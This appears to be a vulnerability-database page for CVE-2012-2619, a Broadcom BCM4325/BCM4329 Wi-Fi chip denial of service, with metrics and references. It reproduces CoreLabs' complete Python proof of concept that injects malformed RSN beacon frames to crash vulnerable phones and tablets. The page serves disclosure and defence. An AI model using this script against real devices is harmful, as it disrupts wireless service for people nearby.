CVE-2012-2619 : Detail

CVE-2012-2619

A03-Injection
16.48%V3
Network
2012-11-14
10h00 +00:00
2013-01-30
09h00 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Broadcom BCM4325 and BCM4329 Wi-Fi chips, as used in certain Acer, Apple, Asus, Ford, HTC, Kyocera, LG, Malata, Motorola, Nokia, Pantech, Samsung, and Sony products, allow remote attackers to cause a denial of service (out-of-bounds read and Wi-Fi outage) via an RSN 802.11i information element.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 22739

Publication date : 2012-11-14 23h00 +00:00
Author : CoreLabs
EDB Verified : No

# Exploit Author: CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, # Vendor Homepage: # Software Link: [download link if available] # Version: 1.0 # Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HTC Droid Incredible Samsung Spica Acer Liquid Motorola Devour Vehículo Ford Edge Dispositivos afectados con el chipset BCM4329: Apple iPhone 4 Apple iPhone 4 Verizon Apple iPod 3G Apple iPad Wi-Fi Apple iPad 3G Apple iPad 2 Apple Tv 2G Motorola Xoom Motorola Droid X2 Motorola Atrix Samsung Galaxy Tab Samsung Galaxy S 4G Samsung Nexus S Samsung Stratosphere Samsung Fascinate HTC Nexus One HTC Evo 4G HTC ThunderBolt HTC Droid Incredible 2 LG Revolution Sony Ericsson Xperia Play Pantech Breakout Nokia Lumina 800 Kyocera Echo Asus Transformer Prime Malata ZPad" # CVE : 2012-2619 #!/usr/bin/env python import sys import time import struct import PyLorcon2 def beaconFrameGenerator(): sequence = 0 while(1): sequence = sequence % 4096 # Frame Control frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon frame += '\x00' # Flags: 0 frame += '\x00\x00' # Duration: 0 frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: #part of the generator # Frame Body frame += struct.pack('Q', time.time()) # Timestamp frame += '\x64\x00' # Beacon Interval: 0.102400 seconds frame += '\x11\x04' # Capability Information: ESS, Privacy, #Short Slot time # Information Elements # SSID: buggy frame += '\x00\x05buggy' # Supported Rates: 1,2,5.5,11,18,24,36,54 frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' # DS Parameter Set: 6 frame += '\x03\x01\x06' # RSN IE frame += '\x30' # ID: 48 frame += '\x14' # Size: 20 frame += '\x01\x00' # Version: 1 frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP frame += '\x01\x00' # Pairwise cipher suite count: 1 frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP frame += '\xff\xff' # Authentication suites count: 65535 frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK frame += '\x00\x00' sequence += 1 yield frame if __name__ == "__main__": if len(sys.argv) != 2: print "Usage:" print "\t%s <wireless interface>" % sys.argv[0] sys.exit(-1) iface = sys.argv[1] context = PyLorcon2.Context(iface) context.open_injmon() generator = beaconFrameGenerator() for i in range(10000): frame = generator.next() time.sleep(0.100) context.send_bytes(frame)

Products Mentioned

Configuraton 0

Broadcom>>Bcm4325 >> Version *

    Broadcom>>Bcm4329 >> Version *

      Configuraton 0

      Apple>>Iphone_os >> Version To (including) 6.0.2

      Apple>>Iphone_os >> Version 6.0

      Apple>>Iphone_os >> Version 6.0.1

      References

      http://support.apple.com/kb/HT5642
      Tags : x_refsource_CONFIRM
      http://www.kb.cert.org/vuls/id/160027
      Tags : third-party-advisory, x_refsource_CERT-VN
      http://support.apple.com/kb/HT5643
      Tags : x_refsource_CONFIRM